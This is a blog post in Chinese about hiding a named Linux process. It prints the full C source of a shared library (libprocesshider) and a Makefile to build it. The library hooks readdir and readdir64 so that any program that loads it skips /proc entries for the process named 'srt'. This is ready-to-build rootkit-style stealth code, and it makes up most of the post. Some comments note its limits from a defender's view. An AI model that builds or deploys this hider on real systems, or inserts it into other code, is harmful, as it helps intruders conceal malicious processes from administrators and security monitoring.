linux隐藏特定进程,linux 隐藏进程

本文介绍了一个简单的进程隐藏技术实现方案,通过修改readdir函数的行为来过滤指定名称的进程,使其在进程列表中不可见。需要注意,这种过滤只发生在用户态:它只影响加载了该共享库并通过 readdir/readdir64 枚举 /proc 的程序,内核中的进程信息以及 /proc/<pid> 目录本身并未改变。该方案适用于Linux环境,并提供了完整的源代码及编译指令。


2、源码如下

root@ubuntu:/var/srt/libprocesshider# cat processhider.c

#define _GNU_SOURCE

#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/*
 * Name compared against each process's command name, i.e. the text between
 * the parentheses in /proc/<pid>/stat. /proc entries whose name equals this
 * string are skipped by the readdir wrappers defined in this file.
 */
static const char *process_to_filter = "srt";

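/*
 * Resolve the path of the directory behind an open DIR* handle.
 *
 * The descriptor returned by dirfd() is looked up through the
 * /proc/self/fd/<fd> symlink and the link target is copied into buf.
 *
 * dirp: open directory stream
 * buf:  destination buffer, NUL-terminated on success
 * size: capacity of buf in bytes, including the terminator
 *
 * Returns 1 on success, 0 if size is zero, the stream has no descriptor,
 * or the link cannot be read. A target longer than size - 1 bytes is
 * truncated without an error.
 */
static int get_dir_name(DIR *dirp, char *buf, size_t size)
{
    if (size == 0) {
        return 0;
    }

    int fd = dirfd(dirp);
    if (fd == -1) {
        return 0;
    }

    char link_path[64];
    snprintf(link_path, sizeof(link_path), "/proc/self/fd/%d", fd);

    /*
     * readlink() does not NUL-terminate and may fill the whole buffer, so
     * keep one byte free; otherwise buf[ret] would be written one past the
     * end of the caller's array.
     */
    ssize_t ret = readlink(link_path, buf, size - 1);
    if (ret == -1) {
        return 0;
    }

    buf[ret] = '\0';
    return 1;
}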

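/*
 * Look up the command name of a process from /proc/<pid>/stat.
 *
 * pid: directory entry name; an empty string or anything that is not
 *      purely decimal digits is rejected before any file is opened
 * buf: receives the NUL-terminated name; must hold at least 256 bytes,
 *      because the interface carries no size and the parse is capped at
 *      255 characters
 *
 * Returns 1 when a name was stored in buf, 0 otherwise (non-numeric pid,
 * unreadable stat file, or a first line that does not parse).
 */
static int get_process_name(char *pid, char *buf)
{
    /* An empty name would turn the path into "/proc//stat". */
    if (*pid == '\0' || strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }

    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);

    FILE *f = fopen(tmp, "r");
    if (f == NULL) {
        return 0;
    }

    /* tmp is reused: first the path, now the first line of the file. */
    char *line = fgets(tmp, sizeof(tmp), f);
    fclose(f);
    if (line == NULL) {
        return 0;
    }

    /*
     * The line starts with "<pid> (<name>) ...". The conversion is bounded
     * so it cannot write past a 256-byte buffer, and both fields must match
     * so that buf is never left uninitialised when success is reported.
     */
    int unused;
    if (sscanf(tmp, "%d (%255[^)]", &unused, buf) != 2) {
        return 0;
    }

    return 1;
}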

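/*
 * DECLARE_READDIR(dirent, readdir) defines a replacement for the named
 * directory-reading function. The replacement resolves the next definition
 * of the same symbol with dlsym(RTLD_NEXT, ...) on first use, forwards every
 * call to it, and skips an entry only when all of the following hold:
 *   - the stream's directory resolves to exactly "/proc",
 *   - the entry name is numeric and its stat file yields a process name,
 *   - that name equals process_to_filter.
 * Every other entry, and the end-of-directory NULL, is returned unchanged.
 *
 * If the underlying function cannot be resolved, the error is reported on
 * stderr and NULL is returned instead of calling through a null pointer.
 *
 * Review notes (defensive view): only readdir and readdir64 are wrapped and
 * nothing else is touched, so the filtering applies solely to listings made
 * through these two functions in processes that have this object loaded.
 * The /proc/<pid> directory itself still exists and can be opened by path,
 * so a listing obtained without this object loaded will differ from a
 * filtered one. The match is an exact string comparison on the name parsed
 * from /proc/<pid>/stat, not on the executable path.
 */
#define DECLARE_READDIR(dirent, readdir)                                \
static struct dirent *(*original_##readdir)(DIR *) = NULL;              \
                                                                        \
struct dirent *readdir(DIR *dirp)                                       \
{                                                                       \
    if (original_##readdir == NULL) {                                   \
        original_##readdir = dlsym(RTLD_NEXT, #readdir);                \
        if (original_##readdir == NULL) {                               \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \
            return NULL;                                                \
        }                                                               \
    }                                                                   \
                                                                        \
    struct dirent *dir;                                                 \
                                                                        \
    while (1) {                                                         \
        dir = original_##readdir(dirp);                                 \
        if (dir) {                                                      \
            char dir_name[256];                                         \
            char process_name[256];                                     \
            if (get_dir_name(dirp, dir_name, sizeof(dir_name)) &&       \
                strcmp(dir_name, "/proc") == 0 &&                       \
                get_process_name(dir->d_name, process_name) &&          \
                strcmp(process_name, process_to_filter) == 0) {         \
                continue;                                               \
            }                                                           \
        }                                                               \
        break;                                                          \
    }                                                                   \
    return dir;                                                         \
}

DECLARE_READDIR(dirent64, readdir64);

DECLARE_READDIR(dirent, readdir);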

root@ubuntu:/var/srt/libprocesshider#

root@ubuntu:/var/srt/libprocesshider# cat Makefile

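# Build the shared object from processhider.c.
# Both targets are declared phony; the original ".PHONY clean:" line made
# ".PHONY" and "clean" two ordinary targets instead of marking clean phony.
.PHONY: all clean

all: libprocesshider.so

libprocesshider.so: processhider.c
	gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl

clean:
	rm -f libprocesshider.so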

root@ubuntu:/var/srt/libprocesshider#
